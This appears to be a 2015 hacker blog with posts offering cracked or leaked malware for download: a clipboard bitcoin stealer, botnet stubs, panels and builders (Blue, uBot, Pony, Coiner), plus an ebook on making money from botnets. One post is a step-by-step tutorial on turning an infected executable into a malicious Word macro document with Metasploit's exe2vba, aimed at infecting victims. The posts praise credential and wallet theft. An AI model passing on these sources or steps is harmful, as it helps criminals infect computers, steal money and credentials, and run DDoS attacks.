Donation

Donate? BTC: 1B6qSDr4gn6jZTWxdAJoHHPYQDPeoaL2CS

Sunday, March 22, 2015

Bitcoin Switcharoo BTC stealer source!

Hey everyone, I've been looking around for new programs to crack and release. This program was made on the popular skidforum, "Hackforums.net"

Heres a pic of the thread




















BTC Switcharoo is very simple, it replaces an address on the persons clipboard with your own. This does not start with Windows so you can use it with your crypters if need be. I was intending to make it in .NET, but that would be too easy, so I set myself a challenge.Its coded in C, for those wondering, and compiled with Tiny C Compiler. Tested on XP x86 and Windows 7 x64
 

It was an easy crack.


source: We have switched to http://lethaldose.me for downloads

another easy crack. See you all later!

Saturday, March 21, 2015

How to make money from your botnet! Quick and easy! 7 METHODS!


Hey everyone, this is an ebook i wrote awhile ago, it was originally for HF, then i got no sales, and omni was being a bitch. 


http://adf.ly/1AxukP

Sunday, March 15, 2015

Blue DDOS botnet. Stub source, panel source, builder.

Blue botnet is a high quality ddos botnet. 50 bots apparently can take down the skid infested "hack forums.net".. The "Owner" contacted me looking to buy some bots and a possible partner ship. He didn't have a crypt, and was half mental. He pissed me off so I did some research, took apart his stub, and then finally got ahold of the panel.. The coder is stupid.

Screenshots of the sauce:
















































some info on the botnet:
https://www.youtube.com/watch?v=HJn0bAWsw8I
https://www.youtube.com/watch?v=EjffaU4p3pQ
http://its-ownz.blogspot.com/2015/02/blue-botnet-http-botnet.html


Email: botzone0@gmail.com

WILL GIVE FOR FREE, JUST SHOOT ME AN EMAIL, WILL BE FULLY LEAKED IN 2 DAYS

Friday, March 13, 2015

µBot Botnet source and analysis

I'm sure many people reading this have heard of the malware with the name of "uBot". The source of this botnet was released earlier this year, It was originally named "WebNet". This botnet has a very small stub size of only 9KB compressed, and about 36KB un-compressed.

The features include;

INSTANT Infection, no waiting.
– Download & Execute.
– Update.
– Visit Webpage [Visible].
– Visit Webpage [Invisible].
– Uninstall.
– Add to Startup.
– Critical Process.
– Hidden File.
– Admin detection.
– Mutex.
– Coded in VB6, no .NET Framework dependency!
– Small, ~10kb compressed, 36kb uncompressed.
– Great stability.
Panel:
– Detailed statistics.
– Location plot, map graph.
– Pie Charts [Bot Status, Operating System, Admin].
– Tool-tip for last commands sent for each client.
– Bot selection preferences.
– Integrated Ajax, means everything is realtime! From client list to bot count.

On top of the extremely small stub size, its coded in vb6, so there is no .net dependancies, and the botnet panel is almost or as simple as the betabot 1.7.0.1 panel . This was a very stable botnet in its time, but I'm not sure how stable it is now that it has been leaked and malware researchers have taken a look at it. The main per pose for this botnet was for stability and for easy use.

Heres the downloads.

http://www.mediafire.com/download/vkqg2zgwonr78l9/uBot_Sauce.rar
that download includes the panel + vb6 stub source, and the sql files.

Tuesday, March 10, 2015

.exe to .doc silent macro exploit tutorial

I see everyone trying to sell this for $500++ on various forums, the problem is that people are actually buying it. So, http://botzone1.blogspot.com is going to teach you how to create your own .doc exploit.

Things you will need:

- FUD server (it can be detected, but its going to be like 60/63)
- Metasploit (can be downloaded here)
- Microsoft word (to test it)

The following Microsoft applications are affected:
  • Microsoft Office 2007 SP3
  • Microsoft Word 2007 SP3
  • Microsoft Office 2010 SP1 and SP2 (32-bit and 64-bit editions)
  • Microsoft Word 2010 SP1 and SP2 (32-bit and 64-bit editions)
  • Microsoft Office for Mac 2011
  • Microsoft Office Compatibility Pack SP3
  • Microsoft SharePoint Server 2010 SP1 and SP2 with Word Automation Services
  • Microsoft Word Web Apps 2010 SP2 and prior

 Alrighty, lets get started.

You're going to want to fire up the metasploit pro console, it might take a few minutes for it to be ready for use.

 You should be looking like this:

















alright so you are going to want to type this in "cd C:\metasploit\apps\pro\msf3\tools", and then go into a new windows explorer window and place your infected file into that directory.

Unfortunatly my metasploit just crashed, so I'm going to wing the rest of the tutorial, post any questions in the comments.

alright so now we're inside of the directory, now type this "exe2vba.rb infectedfile.exe evil.vba"

now go back to your windows explorer window, and look in C:\metasploit\apps\pro\msf3\tools and you should see a file called "evil.vba".. if you dont see that file restart.

open the .vba file. There will be two sections in the file (just open it in notepad). The first part is the vba script, and the other part is the shellcode. the shell code is going to look like a bunch of numbers and letters.
exe2vba.rb infected.exe evil.vba






















alright, now open up microsoft word (MUST BE A Vulnerable VERSION!!!) go to view, and select macros


copy the vb code (NOT the letters and numbers) and paste it into the first portion of the vb file






















save it as a word97-2003Doc. alright, almost done! Now open the document and paste the shell code (letters & numbers) into the document, and save it again. Congratz, you just made the exploit, was it still worth $500? that's what I thought.... I'm going to be posting a tutorial on how to make it completely fud very soon.
c:\metasploit\apps\pro\msf3\tools
c:\metasploit\apps\pro\msf3\tools
c:\metasploit\apps\pro\msf3\tools

Sunday, March 8, 2015

Pony Botnet 1.9 leaked (advanced stealers included)

Pony 1.9 is notorious for banking, bitcoin stealing, and stealing other things..
The Bitcoin theft is in addition to a slew of credentials, over 700,000, that Pony pilfered from September 2013 to January including: 600,000 website login credentials 100,000 email account credentials 16,000 FTP account credentials 900 Secure Shell account credentials 800 Remote Desktop credentials - See more at: http://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463#sthash.f17KzXK0.dpuf

Pony steals more than 30 concurrency wallets, and is very good at what it does. Some of the botnet is based off the Zeus src source. I personally used this botnet for a year and moved on to more updated malware, but at the time that I used it, it worked fantastically. Most of the panel is in russian, along with the builder, but we were able to translate the russian in the builder.

builder screenshot:

















































The builder was leaked by a member on the forum "TrojanForge" and the botnet was sold on multiple underground forums. The botnet is good at what it does, and is up at the top with betabot, zeus, and citadel.

Here are the downloads..

Builder:
We have switched to http://lethaldose.me for downloads
Panel:
We have switched to http://lethaldose.me for downloads

Coiner HTTP leaked panel

Before I even start to write this article, I want everyone to know that coiner http is the worst bot on the market right now. Its fucking awful. The only reason why im writing this is because its awful and the owner needs to be exposed.


The bot was coded by the member "Sh1eld" on hackforums. its coded in shit.net (vb.net). It claims to have a bunch of features, but every customer claims they never worked, the the botnet it self didnt work.


The owner is selling it for 100$ per bin. But hes accepting paypal? Paypal and malware don't mix well. The coder also leaves a negative reputation on anyone that hates on him. The stub is 110kb, rather large. I really have nothing to say about this bot, its basically a fancier version of ubot with some more features that dont work.


Im going to leak the panel for now, I'm currently working on a builder..


panel screenshot:



panel download: http://www.mediafire.com/download/ygdv4dnys9hd8w2/coiner_panel.rar


builder download:


coming soon:)